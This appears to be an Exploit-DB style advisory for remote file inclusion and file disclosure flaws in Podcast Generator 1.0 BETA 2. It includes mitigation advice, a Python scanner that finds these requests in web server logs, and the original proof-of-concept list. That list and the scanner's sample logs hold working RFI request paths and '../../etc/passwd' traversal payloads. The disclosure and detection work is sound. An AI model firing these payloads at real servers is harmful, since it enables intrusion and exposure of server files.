Vendor: Podcast Generator
By: ANA TRYAGI
CVSS: 7.5 (HIGH)
Remote File Inclusion/File Disclosure
CWE: 94
Product Name: Podcast Generator
Affected Version From: 1.0 BETA 2
Affected Version To: 1.0 BETA 2
Patch Exists: YES
Related CWE: N/A
CPE: a:podcastgen:podcast_generator:1.0_beta_2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities

Podcast Generator version 1.0 BETA 2 is vulnerable to Remote File Inclusion and File Disclosure. The vulnerable files are loadparser.php, admin.php, categories.php, categories_add.php, categories_remove.php, edit.php, editdel.php, ftpfeature.php, login.php, pgRSSnews.php, showcat.php, upload.php, archive_cat.php, archive_nocat.php, recent_list.php, themes.php and download.php. In the proof-of-concept requests listed below, the inclusion issues are reached through the absoluteurl parameter, and the disclosure issues through the theme_path parameter of themes.php and the filename parameter of download.php. An attacker can exploit these vulnerabilities to include malicious files from remote locations and disclose sensitive information from the server.

Mitigation:

Upgrade to the latest version of Podcast Generator or apply the patch provided by the vendor.
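
To check web server logs for requests shaped like the ones in this advisory, the following added example (not part of the original advisory or the Podcast Generator project) flags any request that supplies absoluteurl and any theme_path or filename value containing traversal sequences or a null byte. It assumes Common/Combined Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory's proof-of-concept list.
INCLUDE_PARAM = "absoluteurl"
PATH_PARAMS = {"theme_path", "filename"}
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def findings_for_target(target):
    """Return sorted finding labels for one request target (path?query)."""
    found = set()
    # parse_qsl percent-decodes values, so %00 and %2e%2e arrive decoded.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        name = name.lower()
        if name == INCLUDE_PARAM:
            # Clients have no reason to supply this variable at all.
            found.add("absoluteurl-supplied")
        elif name in PATH_PARAMS:
            normalized = value.replace("\\", "/")
            if ".." in normalized.split("/") or normalized.startswith("/"):
                found.add("path-traversal")
            if "\x00" in value:
                found.add("null-byte")
    return sorted(found)

def scan(lines):
    """Return (client, target, findings) for each log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (found := findings_for_target(m.group(1))):
            hits.append((line.split(" ", 1)[0], m.group(1), found))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2008:10:00:01 +0000] "GET /podcastgen1.0beta2/core/recent_list.php?absoluteurl=shell HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Mar/2008:10:00:05 +0000] "GET /podcastgen1.0beta2/core/themes.php?theme_path=../../etc/passwd%00 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Mar/2008:10:01:00 +0000] "GET /podcastgen1.0beta2/download.php?filename=episode1.mp3 HTTP/1.1" 200 40960',
]

if __name__ == "__main__":
    for client, target, found in scan(SAMPLE_LOG):
        print(client, ",".join(found), target)
```

Values that are percent-encoded twice are decoded only once here, so a log pipeline that stores already-decoded targets should be scanned with that in mind.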

Exploit-DB raw data:

### Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities
### http://sourceforge.net/project/showfiles.php?group_id=163847
### POC :
### I- Remote File Inclusion Vulnerabilities
### /podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/login.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=shell
### /podcastgen1.0beta2/core/archive_cat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/recent_list.php?absoluteurl=shell
### II- Remote File Disclosure Vulnerabilities
### /podcastgen1.0beta2/core/themes.php?theme_path=../../../../../../../../../etc/passwd%00
### /podcastgen1.0beta2/download.php?filename=../../../../../../../../../etc/passwd
                                  @@@@@@@ ANA TRYAGI @@@@@@@

# milw0rm.com [2008-02-28]